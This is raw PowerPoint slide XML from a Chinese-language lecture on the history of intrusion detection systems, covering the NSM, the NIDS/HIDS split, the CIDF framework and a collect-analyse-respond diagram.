              <a:t>发展简史</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720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NSM</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Network Security Monitor</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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4425315" y="2433955"/>
            <a:ext cx="69164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2400" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>美国加州大学戴维斯分校开发的网络安全监控系统</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sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="组合 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4631690" y="3098165"/>
            <a:ext cx="5462905" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="8603" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="7284"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直接将网络流作为审计数据来源</a:t>
              </a:r>
              <a:endPar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24" name="组合 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4655820" y="3716655"/>
            <a:ext cx="6460490" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="10174" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="885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无需转换审计数据格式监控异种主机</a:t>
              </a:r>
              <a:endPar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sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5417185" y="4839335"/>
            <a:ext cx="4933315"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sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>两大阵营：NIDS vs HIDS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1372235" y="2693670"/>
            <a:ext cx="2930525" cy="2503805"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5841B021-F64F-46EC-9F4C-E10D7C43DA9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发展简史</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1008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CIDF</a:t>
            </a:r>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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Common Intrusion Detection Framework</a:t>
            </a:r>
            <a:r>
              <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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4528185" y="2159635"/>
            <a:ext cx="400050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2400" dirty="0">
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>通用入侵检测框架</a:t>
            </a:r>
            <a:endPar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endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="组合 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4631690" y="2572385"/>
            <a:ext cx="5462905" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="8603" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="7284"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400" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>CIDF</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>体系结构</a:t>
              </a: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4" name="组合 23"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4643120" y="3077210"/>
            <a:ext cx="2998470" cy="957580"/>
            <a:chOff x="8632" y="2713"/>
            <a:chExt cx="4722" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="3402"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400" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>CIDF</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>通信机制</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="26" name="组合 25"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8632" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8632"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9" name="Rectangle 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3973830" y="5277485"/>
            <a:ext cx="7353935"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共享信息和资源 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" alt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&amp; </a:t>
            </a:r>
            <a:r>
              <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入侵检测组件再利用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="组合 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4643120" y="3575685"/>
            <a:ext cx="5177790" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="8154" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="14" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="683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400" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>CIDF</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>语言：公共入侵规范语言</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="17" name="组合 16"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>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0" name="组合 29"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4644390" y="4102735"/>
            <a:ext cx="5177790" cy="957580"/>
            <a:chOff x="8633" y="2713"/>
            <a:chExt cx="8154" cy="1508"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9952" y="2897"/>
              <a:ext cx="683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sz="2400" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>CIDF</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" noProof="0" dirty="0">
                  <a:ln>
                    <a:noFill/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="002060"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:uLnTx/>
                  <a:uFillTx/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>的应用程序接口</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="32" name="组合 31"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="8633" y="2713"/>
              <a:ext cx="1508" cy="1508"/>
              <a:chOff x="8633" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>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39" name="组合 38"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1425575" y="2369185"/>
            <a:ext cx="2625090" cy="2725420"/>
            <a:chOff x="2245" y="4058"/>
            <a:chExt cx="4404" cy="3688"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="图片 34"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2245" y="4058"/>
              <a:ext cx="4404" cy="3689"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36" name="图片 35"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6029" y="7423"/>
              <a:ext cx="614" cy="308"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="标题 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7D39FACB-CF3E-4334-85FB-530BEB62EA0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>1.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IDS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>发展简史</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61" name="组合 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2369185" y="1925955"/>
            <a:ext cx="1341438" cy="1262063"/>
            <a:chOff x="142844" y="1343811"/>
            <a:chExt cx="1624037" cy="1624037"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="49162" name="Picture 5" descr="DO_circle001"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="142844" y="1343811"/>
              <a:ext cx="1624037" cy="1624037"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49163" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="333116" y="1619591"/>
              <a:ext cx="1214664" cy="1070434"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="A25D0A"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>信息</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A25D0A"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="A25D0A"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>收集</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="49164" name="组合 12"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5305108" y="1906588"/>
            <a:ext cx="1346200" cy="1343025"/>
            <a:chOff x="141995" y="4214818"/>
            <a:chExt cx="1428760" cy="1425427"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="49165" name="Picture 11" descr="DP_circle001"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="142844" y="4214818"/>
              <a:ext cx="1425427" cy="1425427"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49166" name="TextBox 14"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="141995" y="4463187"/>
              <a:ext cx="1428760" cy="882131"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>信息</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="003399"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="003399"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>分析</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="49171" name="组合 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8370253" y="1939290"/>
            <a:ext cx="1343025" cy="1341438"/>
            <a:chOff x="142844" y="1343810"/>
            <a:chExt cx="1425427" cy="1425427"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="49172" name="Picture 5" descr="DO_circle001"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="142844" y="1343810"/>
              <a:ext cx="1425427" cy="1425427"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49173" name="TextBox 21"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="245622" y="1581663"/>
              <a:ext cx="1213129" cy="882246"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr anchor="t">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="A25D0A"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>安全</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A25D0A"/>
                </a:solidFill>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="A25D0A"/>
                  </a:solidFill>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:rPr>
                <a:t>响应</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="图片 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4060825" y="2264410"/>
            <a:ext cx="906780" cy="728980"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="图片 36"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7031990" y="2192655"/>
            <a:ext cx="906780" cy="728980"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="AutoShape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1658620" y="3561080"/>
            <a:ext cx="2722880" cy="2321560"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="002060"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="002060"/>
              </a:solidFill>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49179" name="矩形 79"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1694180" y="3672205"/>
            <a:ext cx="2687320" cy="398780"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
          </a:ln>
          <a:effectLst>
            <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"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用户活动状态和行为</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="42" name="组合 41"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1501775" y="3924300"/>
            <a:ext cx="1396365" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="2199" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="25" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2049" y="8378"/>
              <a:ext cx="1254"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网络</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="26" name="组合 25"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1104" y="8034"/>
              <a:ext cx="1381" cy="1308"/>
              <a:chOff x="8632" y="3854"/>
              <a:chExt cx="1508" cy="1508"/>
            </a:xfrm>
          </p:grpSpPr>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43" name="组合 42"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1491615" y="4359910"/>
            <a:ext cx="1396365" cy="830580"/>
            <a:chOff x="1104" y="8034"/>
            <a:chExt cx="2199" cy="1308"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="Rectangle 2"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
